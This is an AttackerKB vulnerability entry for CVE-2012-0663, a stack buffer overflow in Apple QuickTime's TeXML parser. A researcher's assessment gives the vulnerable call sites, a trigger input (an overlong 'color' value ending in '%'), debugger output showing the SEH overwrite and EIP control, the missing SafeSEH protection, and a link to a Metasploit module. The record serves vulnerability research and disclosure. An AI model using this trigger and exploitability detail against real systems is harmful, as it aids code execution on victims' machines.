CVE-2012-0663 Apple Quicktime Buffer Overflow

2019-05-09T17:57:16
ID AKB:42CF829F-641F-4729-87B7-3BD8FB4D042B
Type attackerkb
Reporter AttackerKB
Modified 2020-02-13T17:12:07

Description

This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Apple Quicktime. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.

Recent assessments:

wchen-r7 at 2019-09-12T18:07:55.877043Z reported:

Down p sub_67EED2E0+193 call dangerous_copy_sub_67EED1E0 <-- Interesting (0x67EED473) Down p sub_67EED2E0+1E7 call dangerous_copy_sub_67EED1E0 Down p sub_67EED2E0+23C call dangerous_copy_sub_67EED1E0 Down p sub_67EED2E0+28D call dangerous_copy_sub_67EED1E0 Down p manage_transform_sub_67EED810+B6 call dangerous_copy_sub_67EED1E0 (*) this is the one we have reviewed ```

We noticed that sub_67EED2E0+193 can also trigger the crash, with even longer data without triggering the warning. In this particular case, the parser is handling arguments ending with a "%", which can be reached as a 'color' argument, for example:

{ color: AAAAAAAAAAAAAA% }

Where "AAAAAAAAAAAAAA" will be copied on the stack. Also see poc3.xml for example.

As a result, we get to overwrite the stack with more data (like I said), and we end up overwriting the SEH:

(c54.da8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. *** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Program Files\QuickTime\QTSystem\QuickTime3GPP.qtx - eax=00000030 ebx=0013cc25 ecx=0e0a7288 edx=0000355f esi=00140000 edi=0013cba0 eip=67eed1f3 esp=0013cb74 ebp=00000004 iopl=0 nv up ei pl nz na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010206 QuickTime3GPP!EatTx3gComponentDispatch+0x4033: 67eed1f3 8806 mov byte ptr [esi],al ds:0023:00140000=41 0:000&gt; !exchain 0013ce24: 30303030 Invalid exception stack at 30303030 0:000&gt; g (c54.da8): Access violation - code c0000005 (first chance) First chance exceptions are reported before any exception handling. This exception may be expected and handled. eax=00000000 ebx=00000000 ecx=30303030 edx=7c9032bc esi=00000000 edi=00000000 eip=30303030 esp=0013c7a4 ebp=0013c7c4 iopl=0 nv up ei pl zr na pe nc cs=001b ss=0023 ds=0023 es=0023 fs=003b gs=0000 efl=00010246 30303030 ?? ???

quicktime.qts does not have Safe SEH protected.

The final version of the exploit can be found here: https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/windows/fileformat/apple_quicktime_texml.rb